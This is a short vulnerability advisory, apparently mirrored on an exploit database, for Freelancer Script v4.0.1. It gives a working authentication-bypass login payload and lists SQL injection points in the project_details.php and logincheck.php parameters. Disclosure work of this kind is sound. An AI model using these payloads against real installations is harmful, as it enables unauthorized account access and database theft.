###########################

# Freelancer Script 4.0.1 SQL Injection Vulnerability

###########################

################################################
#Title: FREELANCER SCRIPT v4.0.1 - Authentication Bypass & SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.2daybiz.com
#Vendor URL:
http://2daybiz.com/content/products/products/job-site-script/119-freelancer-script.php
#Product: FREELANCER SCRIPT v4.0.1
#Google Dork: N/A
################################################
#
#  Product & Service Introduction:
#
#  Freelance script easy to manage and very simple to deploy,
#  comes with a web-based administrative panel has the capabilities to
manage users,
#  financial transactions, categories and all relevant aspects of the
system, with few clicks of the mouse.
#
#
# http://localhost/freelancerscript/loginfr.php
#
# Username: 'or''='
# Password: 'or''='
#
#
# --SQL Injection--
#
http://localhost/freelancerscript/project_details.php?pid=24[SQL]&title=project1
#
#   PoC:
#     http://prnt.sc/ekbqnm
#
# POST :
# http://localhost/freelancerscript/logincheck.php
# data$: uname=demo[SQL]&pwd=demo&place=log&enter=Login
#
# PoC:
#  http://prnt.sc/ekbrel
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################

-- 
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-03-18]

###########################